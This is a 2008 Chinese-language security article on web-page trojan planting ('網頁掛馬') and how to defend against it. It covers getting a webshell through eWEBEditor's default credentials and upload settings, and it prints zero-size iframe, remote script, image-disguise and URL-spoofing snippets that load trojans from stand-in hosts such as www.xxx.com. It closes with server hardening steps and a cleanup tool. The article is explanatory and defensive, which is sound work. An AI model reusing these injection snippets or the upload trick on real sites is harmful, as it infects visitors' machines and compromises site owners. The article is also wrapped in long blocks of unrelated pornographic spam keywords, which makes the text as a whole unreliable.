国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

黑客攻防:網頁掛馬攻防全接觸
2008-09-25   IT專家網

網頁掛馬是攻擊者慣用的入侵手段,其影響極其惡劣。不僅讓站點管理者蒙羞,而且殃及池魚使站點的瀏覽者遭殃。不管是站點維護者還是個人用戶,掌握、了解一定的網頁掛馬及其防御技術是非常必要的。

  1、關于網頁掛馬

  網頁掛馬就是攻擊者通過在正常的頁面中(通常是網站的主頁)插入一段代碼。瀏覽者在打開該頁面的時候,這段代碼被執行,然后下載并運行某木馬的服務器端程序,進而控制瀏覽者的主機。

  2、獲取Webshell

  攻擊者要進行網頁掛馬,必須要獲取對站點文件的修改權限,而獲取該站點Webshell是最普遍的做法。

  其實可供攻擊者實施的攻擊手段比較多,比如注入漏洞、跨站漏洞、旁注漏洞、上傳漏洞、暴庫漏洞和程序漏洞都可被利用。下面就列舉一個當前比較流行的eWEBEditor在線HTML編輯器上傳漏洞做個演示和分析。

  1).網站入侵分析

  eWEBEditor是一個在線的HTML編輯器,很多網站都集成這個編輯器,以方便發布信息。低版本的eWEBEditor在線HTML編輯器,存在者上傳漏洞,黑客利用這點得到WEBSHELL(網頁管理權限)后,修改了網站,進行了掛馬操作。

  其原理是:eWEBEditor的默認管理員頁面沒有更改,而且默認的用戶名和密碼都沒有更改。攻擊者登陸eWEBEditor后,添加一種新的樣式類型,然后設置上傳文件的類型,加入asp文件類型,就可以上傳一個網頁木馬了。(圖1)

網站入侵分析

  2).判斷分析網頁漏洞

  (1).攻擊者判斷網站是否采用了eWEBEditor的方法一般都是通過瀏覽網站查看相關的頁面或者通過搜索引擎搜索類似"ewebeditor.asp?id="語句,只要類似的語句存在,就能判斷網站確實使用了WEB編輯器。

  (2).eWEBEditor編輯器可能被黑客利用的安全漏洞:

  a.管理員未對數據庫的路徑和名稱進行修改,導致黑客可以利用編輯器默認路徑直接對網站數據庫進行下載。

  b.管理員未對編輯器的后臺管理路徑進行修改導致黑客可以通過數據庫獲得的用戶名和密碼進行登陸。或者是默認密碼。直接進入編輯器的后臺。

  c.該WEB編輯器上傳程序存在安全漏洞。

  分析報告指出:網站的admin路徑下發現cer.asp網頁木馬,經分析為老兵的網頁木馬。(加密后依舊能通過特征碼分辨,推薦網站管理員使用雷客ASP站長安全助手,經常檢測網站是否被非法修改。)

  3、揭秘幾種最主要的掛馬技術

  (1).iframe式掛馬

  網頁木馬被攻擊者利用iframe語句,加載到任意網頁中都可執行的掛馬形式,是最早也是最有效的的一種網絡掛馬技術。通常的掛馬代碼如下:

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

  解釋:在打開插入該句代碼的網頁后,就也就打開了http://www.xxx.com/muma.html頁面,但是由于它的長和寬都為“0”,所以很難察覺,非常具有隱蔽性。下面我們做過做個演示,比如在某網頁中插入如下代碼: 

<iframe src=http://security.ctocio.com.cn width=200 height=200></iframe>

  在“百度”中嵌入了“IT專家網安全版塊”的頁面,效果如圖2。

iframe式掛馬

  (2).js腳本掛馬

  js掛馬是一種利用js腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術,如:黑客先制作一個.js文件,然后利用js代碼調用到掛馬的網頁。通常代碼如下: 

<script language=javascript src=http://www.xxx.com/gm.js></script>

  http://www.xxx.com/gm.js就是一個js腳本文件,通過它調用和執行木馬的服務端。這些js文件一般都可以通過工具生成,攻擊者只需輸入相關的選項就可以了,如圖3就是一個JS木馬的代碼。(圖3)

js腳本掛馬

  (3).圖片偽裝掛馬

  隨著防毒技術的發展,黑手段也不停地更新,圖片木馬技術逃避殺毒監視的新技術,攻擊者將類似:http://www.xxx.com/test.htm中的木馬代碼植入到test.gif圖片文件中,這些嵌入代碼的圖片都可以用工具生成,攻擊者只需輸入相關的選項就可以了,如圖4。圖片木馬生成后,再利用代碼調用執行,是比較新穎的一種掛馬隱蔽方法,實例代碼如:

<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe>
<img src="http://www.xxx.com/test.jpg"></center>
</html>

  注:當用戶打開http://www.xxx.com/test.htm是,顯示給用戶的是http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm網頁代碼也隨之運行。(圖4)

圖片偽裝掛馬#p#副標題#e#

  (4).網絡釣魚式掛馬

  網絡中最常見的欺騙手段,黑客們利用人們的獵奇、貪心等心理偽裝構造一個鏈接或者一個網頁,利用社會工程學欺騙方法,引誘點擊,當用戶打開一個看似正常的頁面時,網頁代碼隨之運行,隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息,然后竊取個人隱私相關聯。比如攻擊者模仿騰訊公司設計了一個獲取QQ幣的頁面,引誘輸入QQ好和密碼見圖5。

網絡釣魚式掛馬

  等用戶輸入完提交后,就把這些信息發送到攻擊者指定的地方見圖6。

給攻擊者發送用戶信息

  (5).URL偽裝掛馬

  高級欺騙,黑客利用IE或者Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術,當用戶訪問木馬頁面時地址欄顯示www.sina.com或者security.ctocio.com.cn等用戶信任地址,其實卻打開了被掛馬的頁面,從而實現欺騙,示例代碼如:

<p><a id="qipian" href="http://www.hacker.com.cn"></a></p>
<div>
<a href="http://security.ctocio.com.cn" target="_blank">
<table>
<caption>
<label for="qipian">
<u style="cursor;pointer;color;blue">
security.ctocio.com.cn IT專家網安全版塊
</u>
</label>
</caption>
</table>
</a>
</div>

  上面的代碼的效果,貌似security.ctocio.com.cn是一個如圖7的鏈接。

偽URL

  如果點擊卻打開了http://www.hacker.com.cn,如圖8。

URL偽裝效果

  總結:上述的掛馬方式都是利用了系統的漏洞,并且掛馬的代碼不用攻擊者編寫,都是實現了工具化、傻瓜化。技術門檻比較低,因此危害也特別大。

  4、網頁木馬的防御和清除

  1).防御網頁木馬,服務器設置非常重要,反注冊、卸載危險組件:(網頁后門木馬調用的組件)

  (1).卸載wscript.shell對象,在cmd先或者直接運行:regsvr32 /u %windir%system32WSHom.Ocx

  (2).卸載FSO對象,在cmd下或者直接運行:regsvr32.exe /u %windir%system32scrrun.dll

  (3).卸載stream對象,在cmd下或者直接運行:regsvr32.exe /u /s "C:Program FilesCommon FilesSystemadomsado15.dll"

  注:如果想恢復的話只需重新注冊即可,例如:regsvr32 %windir%system32WSHom.Ocx

  2).清理網頁掛馬

  如果站點中的多個頁面被掛馬,如果手工一個個清理那幾乎是不可能的。筆者推薦“雷客圖ASP站長安全助手”,其實它也算是個Webshell,利用其提供功能可以清除網頁中的掛馬代碼。

  (1).查找ASP木馬:“雷客圖”可以基于特征碼對站點內的文件進行掃描,然后找到asa、cdx、cer等格式的可疑文件,管理員可以據此確定進行判斷確定是否刪除。(圖9)

查找ASP木馬

  (2).文件篡改檢測:入侵者進入web之后往往會修改一些文件,利用這個功能就是在平時提取文件信息以備檢查篡改,這個功能對于定位網頁掛馬文件非常方便。

  (3).清除網頁掛馬:這是“雷客圖”的輔助插件,黑客入侵網站之后可能利用腳本在特定頁面添加惡意代碼(一般是用iframe標簽指向其他網址)。由于其使用腳本一次可以修改n個文件,清理起來十分不便,該功能就是批量腳本的逆向,清理掛馬非常方便。

  雷客圖ASP站長還有很多功能,比如數據庫保護、可疑文件搜索、SQL防注入等。需要說明的是,使用其一定要更改它的默認用戶名和密碼。

  總結:小心被網頁掛馬所傷,不僅是對瀏覽者而言,更是針對網站的維護者。只有網站管理者加固站點的安全,從源頭上杜絕網頁木馬,才能為用戶提供安全的瀏覽環境。當然,個人用戶掌握一定的安全技能也是非常必要的。

熱詞搜索:

上一篇:黑客揭秘入侵佩林郵箱過程
下一篇:災難恢復:企業數據保障至關重要的一環

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲啪啪综合av一区二区三区| 夜夜嗨av一区二区三区四季av| 亚洲免费在线视频| 91原创在线视频| 一区二区国产视频| 欧美色图片你懂的| 青青青爽久久午夜综合久久午夜| 欧美精品在线一区二区三区| 午夜精品国产更新| 精品免费99久久| 成人精品视频一区二区三区| 亚洲欧美色图小说| 欧美精品一卡二卡| 韩国三级中文字幕hd久久精品| 欧美国产日韩在线观看| 欧美最猛黑人xxxxx猛交| 免费观看日韩av| **欧美大码日韩| 日韩美女视频在线| 99re66热这里只有精品3直播| 亚洲va欧美va人人爽午夜| 久久综合色综合88| 精品视频在线免费观看| 狠狠色丁香婷综合久久| 亚洲自拍欧美精品| 中文字幕欧美激情一区| 欧美日韩精品欧美日韩精品一| 精品亚洲免费视频| 天天色综合成人网| 久久网站热最新地址| 精品一区二区在线免费观看| 久久精品久久精品| 久久久久久97三级| 色系网站成人免费| 日韩女优视频免费观看| 制服.丝袜.亚洲.中文.综合| 色噜噜久久综合| 欧美亚洲一区二区三区四区| 播五月开心婷婷综合| 天天综合天天做天天综合| 国v精品久久久网| 在线观看日韩国产| 久久综合网色—综合色88| 国产一区二区三区不卡在线观看| 国产亚洲欧美在线| 美女任你摸久久| 久久99国产精品久久99果冻传媒| 99久久精品99国产精品| 5858s免费视频成人| 欧美日韩中文字幕一区二区| 免费不卡在线视频| 粉嫩在线一区二区三区视频| 成人动漫av在线| 欧美日韩一级二级| 欧洲国产伦久久久久久久| 久久你懂得1024| 日韩在线观看一区二区| 日韩一级大片在线| 亚洲欧美日韩精品久久久久| 欧美色精品天天在线观看视频| 亚洲一线二线三线久久久| 欧美三级电影在线看| 亚洲精品国久久99热| 粉嫩av亚洲一区二区图片| 国产精品99久久久久久久vr| 亚洲成人av一区| 亚洲一区二区三区自拍| 一区二区三区在线免费观看| 国产精品久久三区| 欧美激情综合五月色丁香| 欧美mv日韩mv国产网站| 日本一区二区三区高清不卡| 亚洲午夜久久久久久久久电影院| 在线观看91精品国产麻豆| 亚洲精品福利视频网站| 偷拍亚洲欧洲综合| 自拍偷拍亚洲欧美日韩| 亚洲人吸女人奶水| 亚洲国产日产av| 日韩成人免费看| 国产一区二区三区精品欧美日韩一区二区三区| 精品一区二区三区影院在线午夜| 国产成人亚洲综合色影视| 欧美伊人久久大香线蕉综合69| 欧美亚洲综合色| 精品国产乱码久久久久久浪潮| 国产日韩亚洲欧美综合| 国产精品福利一区二区| 欧美精品一区在线观看| 国产精品剧情在线亚洲| 中文字幕在线观看不卡视频| 中文字幕精品一区二区三区精品| 亚洲日本在线a| 日韩avvvv在线播放| 懂色av中文一区二区三区| 一区二区三区精品在线| 日本v片在线高清不卡在线观看| 成人在线综合网| 欧美精品三级在线观看| 国产三级欧美三级日产三级99| 亚洲最色的网站| 国产精品自拍在线| 欧美精品在线观看播放| 中文字幕亚洲视频| 寂寞少妇一区二区三区| 欧美日韩国产a| 色综合天天综合网国产成人综合天| 国产亚洲欧美中文| 午夜影视日本亚洲欧洲精品| 国产福利一区二区三区在线视频| 欧美午夜电影一区| 中文字幕欧美国产| 亚洲gay无套男同| 97久久超碰精品国产| 日韩美女在线视频| 丝袜a∨在线一区二区三区不卡| 成人免费观看男女羞羞视频| 日韩精品一区二区三区视频播放 | 91精品欧美福利在线观看| 国产精品国产馆在线真实露脸| 爽好多水快深点欧美视频| 99精品欧美一区| 国产亚洲视频系列| 韩国精品主播一区二区在线观看| 欧美日韩成人综合| 午夜久久久久久久久| 欧美性做爰猛烈叫床潮| 亚洲狠狠丁香婷婷综合久久久| 国产成a人无v码亚洲福利| 精品国产乱码久久久久久图片| 国产精品久久久久久久久免费樱桃| 亚洲成av人**亚洲成av**| 91亚洲精华国产精华精华液| 国产欧美日韩在线视频| 国产成人激情av| 日本一区免费视频| 成人网页在线观看| 国产精品久久久久一区二区三区 | 亚洲裸体xxx| 色综合色狠狠天天综合色| 日韩美女视频一区二区| 色国产综合视频| 香蕉成人啪国产精品视频综合网| 欧美日本在线播放| 免费亚洲电影在线| 久久久久9999亚洲精品| 99精品视频在线观看| 色悠悠亚洲一区二区| 日韩国产欧美在线播放| 欧美性高清videossexo| 一区二区三区四区蜜桃| 91久久精品一区二区三| 亚洲午夜国产一区99re久久| 欧美群妇大交群的观看方式| 免费观看91视频大全| 亚洲一区影音先锋| 99视频有精品| 一区二区成人在线视频| 欧美高清视频不卡网| 久久国产精品区| 欧美激情一二三区| 91精彩视频在线观看| 日本aⅴ免费视频一区二区三区 | 高清不卡一区二区在线| 久久久精品免费网站| 99久久99久久综合| 日韩**一区毛片| 亚洲三级在线免费观看| 日韩欧美国产精品| 色婷婷久久99综合精品jk白丝 | 日韩成人伦理电影在线观看| 欧美国产精品久久| 欧美成人猛片aaaaaaa| 91美女片黄在线观看| 国模一区二区三区白浆| 亚洲成人免费视| 亚洲欧美在线视频观看| 欧美一区二区三区婷婷月色| 91在线云播放| 成人午夜免费电影| 韩国av一区二区| 日本美女一区二区三区| 一区二区三区四区在线播放| 国产精品私人影院| 久久精品视频网| 欧美成人一区二区| 欧美高清激情brazzers| 色av一区二区| 99久久精品国产网站| 国产精品一区二区久久不卡| 日日摸夜夜添夜夜添国产精品 | 精品毛片乱码1区2区3区| 欧美日韩一区成人| 一本大道久久a久久精二百| 懂色av中文字幕一区二区三区| 久久国产精品色婷婷| 美女网站色91| 麻豆国产欧美一区二区三区| 亚洲国产视频在线| 亚洲国产视频在线|